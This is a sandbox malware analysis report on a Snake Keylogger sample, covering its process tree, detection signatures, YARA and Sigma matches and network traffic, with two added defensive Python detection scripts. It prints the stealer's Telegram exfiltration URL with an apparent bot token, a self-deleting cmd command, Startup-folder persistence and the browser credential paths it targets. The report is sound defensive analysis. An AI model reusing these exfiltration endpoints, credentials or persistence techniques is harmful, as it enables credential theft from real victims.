
Windows Analysis Report
8kDIr4ZdNj.exe

Overview

General Information

Sample name: 8kDIr4ZdNj.exe (renamed because the original name is a hash value)
Original sample name: d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f.exe
Analysis ID: 1587675
MD5: a031da4bae8bd9cf87c071c94f67d21b
SHA1: 29146f6e8d3107eb8cc5b362b15d8e57c3f815fb
SHA256: d746bf8ebc1bc19872aafe6329fd3865332165c7ef477901e5cdf76e88e9931f
Tags: exe, user-adrian__luca

Detection

Snake Keylogger
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 8kDIr4ZdNj.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\8kDIr4ZdNj.exe" MD5: A031DA4BAE8BD9CF87C071C94F67D21B)
    • lecheries.exe (PID: 4596 cmdline: "C:\Users\user\Desktop\8kDIr4ZdNj.exe" MD5: A031DA4BAE8BD9CF87C071C94F67D21B)
      • RegSvcs.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\8kDIr4ZdNj.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • EmbeddedExe1.exe (PID: 3792 cmdline: "C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe" MD5: 5EFEF6CC9CD24BAEEED71C1107FC32DF)
        • EmbeddedExe2.exe (PID: 6968 cmdline: "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe" MD5: 099EB488DBC2288AB41C4EF64EA7DBA4)
          • cmd.exe (PID: 4544 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • choice.exe (PID: 3172 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 4368 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • lecheries.exe (PID: 2276 cmdline: "C:\Users\user\AppData\Local\konked\lecheries.exe" MD5: A031DA4BAE8BD9CF87C071C94F67D21B)
      • RegSvcs.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Local\konked\lecheries.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • conhost.exe (PID: 3820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 6272 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt MD5: 27F71B12CB585541885A31BE22F61C83)
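Added example, not part of the Joe Sandbox report: three checks over process-creation telemetry that would surface the chain in the tree above. The event records are constructed from that tree (PIDs, image paths and command lines as the report lists them; the konked\lecheries.exe image for PID 4596 is taken from the Sigma file-created event further down); parent images are None where the tree shows no parent. The first check relies on the detail that RegSvcs.exe (PIDs 3496 and 2300) runs with the command line of the binary that started it, which is the normal footprint of a process created suspended and overwritten, consistent with the "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures. The check names and field layout are my own, not Sysmon's or the report's.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events mirroring the tree above (PIDs, images and
# command lines as the report lists them). parent_image is None where the report
# shows no parent; the konked\ image path for PID 4596 comes from the Sigma
# file-created event further down in the report.
EVENTS = [
    {"pid": 6284, "image": r"C:\Users\user\Desktop\8kDIr4ZdNj.exe",
     "cmdline": r'"C:\Users\user\Desktop\8kDIr4ZdNj.exe"', "parent_image": None},
    {"pid": 4596, "image": r"C:\Users\user\AppData\Local\konked\lecheries.exe",
     "cmdline": r'"C:\Users\user\Desktop\8kDIr4ZdNj.exe"',
     "parent_image": r"C:\Users\user\Desktop\8kDIr4ZdNj.exe"},
    {"pid": 3496, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\Desktop\8kDIr4ZdNj.exe"',
     "parent_image": r"C:\Users\user\AppData\Local\konked\lecheries.exe"},
    {"pid": 1588, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "parent_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    {"pid": 4544, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"',
     "parent_image": r"C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe"},
    {"pid": 3172, "image": r"C:\Windows\System32\choice.exe",
     "cmdline": "choice /C Y /N /D Y /T 3", "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 4368, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"',
     "parent_image": None},
]

MISMATCH = "image/cmdline mismatch"
STARTUP_SCRIPT = "script run from Startup folder"
SELF_DELETE = "delayed self-delete"

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# Script extensions that WScript/CScript will run from the per-user Startup folder.
STARTUP_RE = re.compile(
    r"\\start menu\\programs\\startup\\[^\\]+\.(?:vbs|vbe|js|jse|wsf|wsh|bat|cmd|ps1)$", re.I)
# "choice ... /T <n> & del <path>": a sleep without ping/timeout, then delete.
SELF_DELETE_RE = re.compile(r'\bchoice\b[^&]*?/t\s+(\d+)[^&]*&\s*del\s+"?([^"]+?)"?\s*$', re.I)


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def basename(path: Optional[str]) -> str:
    """Lower-cased file name without a trailing .exe, for loose comparison."""
    name = (path or "").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def triage(events) -> Dict[int, List[str]]:
    """Return {pid: [finding, ...]} for every event that trips at least one check."""
    findings: Dict[int, List[str]] = {}
    for ev in events:
        hits: List[str] = []
        args = tokens(ev["cmdline"])
        image = basename(ev["image"])
        # 1. The executable named by argv[0] is not the image actually running:
        #    the hollowed RegSvcs.exe above carries lecheries.exe's command line.
        if args and basename(args[0]) != image:
            hits.append(MISMATCH)
        # 2. Script host started with a script that lives in the Startup folder.
        if image in ("wscript", "cscript") and any(STARTUP_RE.search(a) for a in args[1:]):
            hits.append(STARTUP_SCRIPT)
        # 3. cmd.exe deleting its own parent's image after a choice-based delay.
        m = SELF_DELETE_RE.search(ev["cmdline"])
        if image == "cmd" and m and m.group(2).lower() == (ev["parent_image"] or "").lower():
            hits.append(f"{SELF_DELETE} ({m.group(1)}s)")
        if hits:
            findings[ev["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in sorted(triage(EVENTS).items()):
        print(pid, ", ".join(hits))
```

Running it flags PIDs 3496 and 4596 (mismatch), 4368 (Startup script) and 4544 (self-delete after 3 s). The mismatch check fires on the self-copy at PID 4596 as well, which is expected: AutoIt's Run() passed the parent's command line through unchanged. In production, scope check 1 to Microsoft .NET utilities that are common hollowing targets (RegSvcs, RegAsm, MSBuild, InstallUtil, AppLaunch) or it will also catch legitimate launchers that rewrite argv.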
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration (Snake Keylogger):
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg/sendMessage?chat_id=1217600190", "Token": "7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg", "Chat_id": "1217600190", "Version": "5.1"}
Yara matches (dropped files):

Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
  Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
    • 0x14c35:$a1: get_encryptedPassword
    • 0x14f21:$a2: get_encryptedUsername
    • 0x14a41:$a3: get_timePasswordChanged
    • 0x14b3c:$a4: get_passwordField
    • 0x14c4b:$a5: set_encryptedPassword
    • 0x162f7:$a7: get_logins
    • 0x1625a:$a10: KeyLoggerEventArgs
    • 0x15ec5:$a11: KeyLoggerEventArgsEventHandler
  Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth
    • 0x1c5b2:$a2: \Comodo\Dragon\User Data\Default\Login Data
    • 0x1b7e4:$a3: \Google\Chrome\User Data\Default\Login Data
    • 0x1bc17:$a4: \Orbitum\User Data\Default\Login Data
    • 0x1cc56:$a5: \Kometa\User Data\Default\Login Data
  (2 further entries not shown in this extract)
Yara matches (memory dumps):

Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
    • 0xc49:$a1: get_encryptedPassword
    • 0xf35:$a2: get_encryptedUsername
    • 0xa55:$a3: get_timePasswordChanged
    • 0xb50:$a4: get_passwordField
    • 0xc5f:$a5: set_encryptedPassword
    • 0x230b:$a7: get_logins
    • 0x226e:$a10: KeyLoggerEventArgs
    • 0x1ed9:$a11: KeyLoggerEventArgsEventHandler
  Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen
    • 0x5bf4:$x1: $%SMTPDV$
    • 0x45d8:$x2: $#TheHashHere%&
    • 0x5b9c:$x3: %FTPDV$
    • 0x4578:$x4: $%TelegramDv$
    • 0x1ed9:$x5: KeyLoggerEventArgs
    • 0x226e:$x5: KeyLoggerEventArgs
    • 0x5bc0:$m2: Clipboard Logs ID
    • 0x5dfe:$m2: Screenshot Logs ID
    • 0x5f0e:$m2: keystroke Logs ID
    • 0x61e8:$m3: SnakePW
    • 0x5dd6:$m4: \SnakeKeylogger\
Source: 00000006.00000000.2182565131.0000000000D22000.00000002.00000001.01000000.00000008.sdmp
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  (36 further entries not shown in this extract)
Yara matches (unpacked PEs):

Source: 3.2.RegSvcs.exe.8982ac.0.unpack
  Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
  Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
  Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
    • 0x12e35:$a1: get_encryptedPassword
    • 0x13121:$a2: get_encryptedUsername
    • 0x12c41:$a3: get_timePasswordChanged
    • 0x12d3c:$a4: get_passwordField
    • 0x12e4b:$a5: set_encryptedPassword
    • 0x144f7:$a7: get_logins
    • 0x1445a:$a10: KeyLoggerEventArgs
    • 0x140c5:$a11: KeyLoggerEventArgsEventHandler
  Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth
    • 0x1a7b2:$a2: \Comodo\Dragon\User Data\Default\Login Data
    • 0x199e4:$a3: \Google\Chrome\User Data\Default\Login Data
    • 0x19e17:$a4: \Orbitum\User Data\Default\Login Data
    • 0x1ae56:$a5: \Kometa\User Data\Default\Login Data
  Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Description: Detects executables with potential process hoocking | Author: ditekSHen
    • 0x13a32:$s1: UnHook
    • 0x13a39:$s2: SetHook
    • 0x13a41:$s3: CallNextHook
    • 0x13a4e:$s4: _hook
  (69 further entries not shown in this extract)
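Added example, written for this page rather than taken from Joe Security or the rule authors: a minimal scanner that reproduces the offset:identifier:string rows of the tables above, so the tables are easier to read. The buffer is constructed (zero-filled, with the strings planted at the offsets the memory-dump table gives for the 0x289C000 region; it is not the sample's memory). Running it shows why offset 0x1ed9 is listed under both $a11 (KeyLoggerEventArgsEventHandler) and $x5 (KeyLoggerEventArgs, a prefix of it), why one identifier ($m2) reports three different strings, and how YARA's `ascii wide` modifier finds a UTF-16LE string such as $%TelegramDv$. The $m2 regex is an assumption made to reproduce its three hits; the published rule text is not reproduced here.

```python
import re
from typing import Dict, List, Tuple


def ascii_wide(s: str) -> List[bytes]:
    """YARA's `ascii wide`: the literal as ASCII and as UTF-16LE, regex-escaped."""
    return [re.escape(s.encode("ascii")), re.escape(s.encode("utf-16-le"))]


# Identifier -> byte regexes. Identifiers follow the two rules in the memory-dump
# table. The $m2 regex is an assumption: one YARA identifier reporting three
# different strings implies a regex or wildcard pattern, but the real rule text
# is not reproduced here.
PATTERNS: Dict[str, List[bytes]] = {
    "$a11": ascii_wide("KeyLoggerEventArgsEventHandler"),
    "$x5": ascii_wide("KeyLoggerEventArgs"),
    "$x4": ascii_wide("$%TelegramDv$"),
    "$m2": [rb"(?:Clipboard|Screenshot|keystroke) Logs ID"],
    "$m3": ascii_wide("SnakePW"),
    "$m4": ascii_wide("\\SnakeKeylogger\\"),
}


def build_dump() -> bytes:
    """Constructed stand-in for the 0x289C000 dump: zeros, with the strings
    planted at the offsets the report lists. Not real sample memory."""
    planted = [
        (0x1ed9, b"KeyLoggerEventArgsEventHandler"),
        (0x226e, b"KeyLoggerEventArgs"),
        (0x4578, "$%TelegramDv$".encode("utf-16-le")),   # stored wide, as .NET string literals are
        (0x5bc0, b"Clipboard Logs ID"),
        (0x5dd6, b"\\SnakeKeylogger\\"),
        (0x5dfe, b"Screenshot Logs ID"),
        (0x5f0e, b"keystroke Logs ID"),
        (0x61e8, b"SnakePW"),
    ]
    buf = bytearray(0x6200)
    for off, data in planted:
        buf[off:off + len(data)] = data
    return bytes(buf)


def scan(buf: bytes, patterns: Dict[str, List[bytes]]) -> List[Tuple[int, str, bytes]]:
    """Every (offset, identifier, matched bytes), sorted by offset like the report."""
    hits: List[Tuple[int, str, bytes]] = []
    for ident, regexes in patterns.items():
        for rx in regexes:
            for m in re.finditer(rx, buf):
                hits.append((m.start(), ident, m.group(0)))
    return sorted(hits)


def decode(raw: bytes) -> str:
    """Render a hit: UTF-16LE when every odd byte is NUL, otherwise Latin-1."""
    if len(raw) >= 2 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def render(hits: List[Tuple[int, str, bytes]]) -> List[str]:
    """Format hits the way the report's Strings column does."""
    return [f"0x{off:x}:{ident}: {decode(raw)}" for off, ident, raw in hits]


if __name__ == "__main__":
    for line in render(scan(build_dump(), PATTERNS)):
        print(line)
```

The offsets in the three tables differ for the same strings (0x1ed9 in the dump, 0x140c5 in the unpacked PE, 0x15ec5 in the dropped file) because each is relative to the start of the object scanned, not to a fixed image base; when pivoting from a hit to a disassembler, add the region's base address (0x289C000 for the dump above) to get a virtual address.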

                  System Summary

Sigma match: Process started | Rule authors: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\wscript.exe, ProcessName: wscript.exe, ProcessId: 4368, ParentProcessId: 4004
  ParentCommandLine, ParentImage, CommandLine|base64offset|contains: (empty)
Sigma match: File created | Rule authors: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2300, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\error_log.txt
Sigma match: Process started | Rule author: Michael Haag
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs"
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\wscript.exe, ProcessName: wscript.exe, ProcessId: 4368, ParentProcessId: 4004
  ParentCommandLine, ParentImage, CommandLine|base64offset|contains: (empty)

                  Data Obfuscation

Sigma match: File created | Rule author: Joe Security
  EventID: 11, Image: C:\Users\user\AppData\Local\konked\lecheries.exe, ProcessId: 4596, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lecheries.vbs

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol):
2025-01-10T16:46:56.002743+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6:49713 | 104.21.16.1:443 | TCP
2025-01-10T16:46:58.651903+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6:49729 | 104.21.16.1:443 | TCP
2025-01-10T16:46:59.948839+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6:49740 | 104.21.16.1:443 | TCP
2025-01-10T16:47:02.697410+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6:49759 | 104.21.16.1:443 | TCP

2025-01-10T16:46:54.328980+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49710 | 193.122.6.168:80 | TCP
2025-01-10T16:46:55.436814+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49710 | 193.122.6.168:80 | TCP
2025-01-10T16:46:56.780575+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49714 | 193.122.6.168:80 | TCP
2025-01-10T16:46:58.077474+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49726 | 193.122.6.168:80 | TCP
2025-01-10T16:46:59.385176+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49734 | 193.122.6.168:80 | TCP
2025-01-10T16:47:00.702469+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49746 | 193.122.6.168:80 | TCP
2025-01-10T16:47:01.999344+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49754 | 193.122.6.168:80 | TCP
2025-01-10T16:47:03.405608+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6:49765 | 193.122.6.168:80 | TCP


                  AV Detection

Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg/sendMessage?chat_id=1217600190", "Token": "7767004773:AAG_mBqrFYZNr81F28ktwLAJ3brPq5BTRzg", "Chat_id": "1217600190", "Version": "5.1"}
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | ReversingLabs: Detection: 65%
Source: 8kDIr4ZdNj.exe | Virustotal: Detection: 70%
Source: 8kDIr4ZdNj.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.3% probability
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe | Joe Sandbox ML: detected
Source: 8kDIr4ZdNj.exe | Joe Sandbox ML: detected

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org

Source: 8kDIr4ZdNj.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49711 version: TLS 1.0
Source: Binary string: wntdll.pdbUGP | source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: lecheries.exe, 00000002.00000003.2174226820.0000000004460000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000002.00000003.2175460108.0000000004480000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2296077476.0000000004380000.00000004.00001000.00020000.00000000.sdmp, lecheries.exe, 00000008.00000003.2293614449.00000000041E0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008F445A: GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008FC6D1: FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008FC75C: FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008FEF95: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008FF0F2: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008FF3F3: FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008F37EF: FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008F3B12: FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8kDIr4ZdNj.exe | Code function 0_2_008FBCBC: FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\konked\lecheries.exe | Code function 2_2_00BC445A: GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function 5_2_00007FF75ED13F40: FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function 5_2_00007FF75ED06B00: GetProcAddress,FindFirstFileA,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function 5_2_00007FF75ECE0520: GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId
Source: C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe | Code function 5_2_00007FF75ED12190: FindFirstFileA,FindClose,FindWindowA

                  Networking

Source: Yara match | File source: 3.2.RegSvcs.exe.8982ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.42964ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3e60000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.lecheries.exe.3ff64ac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.EmbeddedExe2.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.lecheries.exe.4100000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2298799548.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe, type: DROPPED
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.21.16.1
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
